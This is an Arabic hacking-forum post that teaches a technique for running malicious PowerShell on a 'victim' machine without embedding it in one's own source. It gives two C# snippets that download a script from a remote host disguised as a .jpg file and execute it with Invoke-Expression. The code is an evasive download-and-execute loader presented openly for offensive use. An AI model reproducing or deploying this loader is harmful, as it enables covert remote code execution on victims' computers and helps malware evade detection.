30.04.2017 Run PowerShell Scripts-Functions Remotely [Infinite Clean]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,533
2,886
1
حياكم الله ياشباب
موضوعنا اليوم عن انك ماتضمن اوامرك الخبيثة بالسورس تبعك
بل انك بتشغلها عن بعد 1- بدون وجودها بجهاز الضحية
2- وبدون وجودها حتى بالسورس تبعك
رح تقدر تنفذ ذلك من خلال الباور شيل سكريبت كامل فانكشن كاملة بكل ماتحتويه من اسطر واوامر
ولو بلغت العشرات..هذا مايميز موضوعنا عن ماسبق

الكود الاول -الطريقة الاولى-
C#:
Runspace runspace = RunspaceFactory.CreateRunspace();
                runspace.Open();
                RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
                Pipeline pipeline = runspace.CreatePipeline();
                pipeline.Commands.AddScript(cmd);
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> results = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject obj in results)
                {
                    stringBuilder.Append(obj);
                }
                return stringBuilder.ToString().Trim();
            }
            string S = @"IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1/devpoint.jpg'); hackbacktrack";
            RunPSCommand((S));
الكود الثاني -الطريقة الثانية-

C#:
PowerShell ps = PowerShell.Create();ps.AddCommand("Invoke-Expression");ps.AddArgument(@"IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1/devpoint.jpg'); hackbacktrack");ps.Invoke();
رح تستغني عن تضمين اوامرك عن طريق الدوت نت
السكربت اللي بيتضمن كل اوامرك موجود جواته فانكشن
تقدر تنفذها عن بعد وسكربتك بيكون برابط مباشر باي امتداد تريده ولو حتى jpg
لانه ببساطة مابيهم الاكستنشن فقط هيه مجرد عملية قراءة للسترينج بالملف
الطريقة هذه كنت محتفظ فيها لحين ماانني اخطط لمواضيع اخرى تعتمد عليها
وتم الامر بعد هذا الموضوع رح يكون مواضيع ان شاء الله بتعتمد الطريقة هذه

 

المرفقات

  • أعجبني
التفاعلات: AhmedSakr

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك